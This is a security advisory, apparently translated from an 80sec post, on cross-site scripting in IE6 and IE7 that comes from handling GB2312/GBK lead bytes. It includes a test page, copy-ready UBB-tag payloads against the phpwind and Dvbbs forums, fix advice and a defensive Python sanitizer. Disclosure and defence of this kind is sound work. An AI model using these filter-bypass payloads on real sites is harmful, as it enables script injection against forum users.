|=-----------------------------------------------------------------------=|
|=------=[ Browser cross-site scripting attacks caused by character sets ]=------=|
|=-----------------------------------------------------------------------=|
|=-----------------------------=[ by jianxin ]=-----------------------------=|
|=--------------------------=[ jianxin@80sec.com ]=-------------------------=|
|=-----------------------------------------------------------------------=|
Note: in the original posting every `<` was replaced with `〈`; if you need the plain-text original, see http://www.80sec.com/release/charset-xss.txt
A web application normally specifies a character set when it sends data to the browser; in China the common choices are utf-8, gbk and gb2312. The character set tells the browser how to interpret the returned bytes. GB2312 and GBK are very widely used, but it turns out that IE has a problem handling these multibyte character sets: some of the program's security checks can be bypassed, which leads to serious cross-site scripting vulnerabilities. When IE meets a byte that is a lead byte in the specified character set, it assumes that this byte and the byte after it form one valid character, and it does so while parsing HTML tags, JavaScript and CSS alike. The tested versions are IE6 and IE7.
1 Bypassing some JS checking rules
<html>
<head>
<title>80sec test</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
</head>
<body>
<script>
window.onerror = function () {
    alert('Vul');   // fires when the second script fails, e.g. on the unterminated string left by the swallowed quote
    return true;
};
</script>
<!-- PHP emits the raw lead byte 0xC1 immediately before the closing quote -->
<script>x='<?php echo chr(0xC1); ?>'; y='[user_in_put]';</script>
</body>
</html>
Here, even if the characters `<`, `>`, `'`, `\` and so on are filtered, the malformed character can still be exploited: the `'` that originally followed the 0xC1 byte is swallowed into it, so the opening `'` before it never finds its closing quote, and whatever is placed in [user_in_put] is executed as JS code.
2 Bypassing checks on certain attributes
To avoid the risk of allowing raw HTML, some forums and programs use UBB tags instead, but under GBK and other multibyte encodings these run into exactly the same problem. Taking the UBB tag most likely to be affected as an example:
[color=xyz<?php echo chr(0xC1); ?>][/color][color=abc onmouseover=alert(/xss/) s=<?php echo chr(0xC1); ?>]exploited[/color]
0xC1 is a lead byte in GB2312, so the above is converted to the following (`\xC1` stands for the raw byte, which the browser then pairs with the `"` after it):
<font color="xyz\xC1"></font><font color="abc onmouseover=alert(/xss/) s=\xC1">exploited</font>
alert(/xss/) is executed by the event handler, so even UBB tags become unsafe and the "protection" is sidestepped. Many forums pay no attention to this; phpwind and Dvbbs (the Dynamic Network forum) are both vulnerable to this kind of attack. Discuz fixed the issue by appending a space after the converted result. There is an interesting trick in using UBB tags here: some databases discard characters that do not match the specified character set, so the lead byte has to be followed by a byte that makes it a valid character before it can be stored in the database; Access, for one, does not have this problem. In some other languages the character set of a string is enforced when the string is processed, and illegal characters either make the transcoding fail or are discarded, so this type of attack cannot be exploited there.
3 Several small examples
Phpwind forum character set cross-site scripting vulnerability
[email=xxxx羃[/email][email=xxxx onmouseover=alert() s=羃]fuck Me[/email]
[font=0xc1]xxx[/font][url=http://onmouseover=alert()//]xx[/url]
Here 羃 is the special 0xC1 byte combined with the character that follows it into one displayed character, so the first payload can be copied directly :)
0xc1 in the second payload stands for the raw byte with that hexadecimal value.
The same trick easily produces XSS in the Dvbbs forum, for example:
<font face="Microsoft Ya羃>xxxxxxxxxxx</font><font face=" onmouseover=alert() x=羃>xxxxxxxxxxx</font>
The test passes on both the new and the old version.
4 About fixes
For program designers: the UTF-8 character set is reliable and does not have this security vulnerability, so consider using UTF-8 when designing a site.
For the majority of developers: remember the principle that the smallest accepted input gives the greatest security. When writing the matching regex, restrict the range of accepted characters and match ASCII characters as far as possible; if Chinese must be allowed, consider Discuz's approach of appending a space after the Chinese text to fix the problem.
For the vast majority of users: because browsers differ in how they handle the characters of a page, using a browser such as Firefox avoids part of this class of problem.
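As an added example, not code from the 80sec post, the following Python models the lenient lead-byte pairing described in section 1 and the strict server-side check behind the fix advice in section 4. The byte ranges are GBK's, the function names are the author's own, and the sample string is constructed to mirror the test page above.

```python
# Added example, not code from the 80sec post. It models the lenient IE6/IE7
# behaviour the post describes (a lead byte always pairs with the next byte)
# and the strict server-side check a fix should apply before output.

def is_lead(b: int) -> bool:
    # GBK lead byte range; GB2312 uses the subset 0xA1-0xF7.
    return 0x81 <= b <= 0xFE

def is_trail(b: int) -> bool:
    # GBK trail byte range. 0x27 ('), 0x22 ("), 0x3E (>) and 0x20 (space) are
    # never trail bytes, so a lead byte in front of them is invalid when decoded strictly.
    return 0x40 <= b <= 0x7E or 0x80 <= b <= 0xFE

def naive_chars(data: bytes) -> list:
    """Split like the lenient browser: every lead byte swallows the byte after it."""
    out, i = [], 0
    while i < len(data):
        n = 2 if is_lead(data[i]) and i + 1 < len(data) else 1
        out.append(data[i:i + n])
        i += n
    return out

def swallowed_ascii(data: bytes) -> bytes:
    """ASCII bytes that the lenient split hides inside a two-byte character."""
    return b"".join(c[1:] for c in naive_chars(data) if len(c) == 2 and c[1] < 0x80)

def orphan_lead_offsets(data: bytes) -> list:
    """Offsets of lead bytes not followed by a valid trail byte (strict view)."""
    bad, i = [], 0
    while i < len(data):
        if is_lead(data[i]):
            if i + 1 < len(data) and is_trail(data[i + 1]):
                i += 2
                continue
            bad.append(i)
        i += 1
    return bad

def neutralize(data: bytes, repl: bytes = b"?") -> bytes:
    """Replace each orphaned lead byte so nothing after it can be swallowed."""
    out, last = bytearray(), 0
    for off in orphan_lead_offsets(data):
        out += data[last:off] + repl
        last = off + 1
    return bytes(out + data[last:])

# Constructed sample mirroring the post's test page: PHP emits \xC1 before the quote.
SAMPLE = b"x='\xc1'; y='[user_in_put]';"
```

Calling neutralize(SAMPLE, b"\xc1 ") reproduces the Discuz-style fix, where the lead byte is kept but swallows a harmless space instead of the quote.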
All content on this site is original; when reproducing it, please be sure to keep the signature and link!
Browser cross-site scripting attacks caused by character sets: http://www.80sec.com/charset-xss.html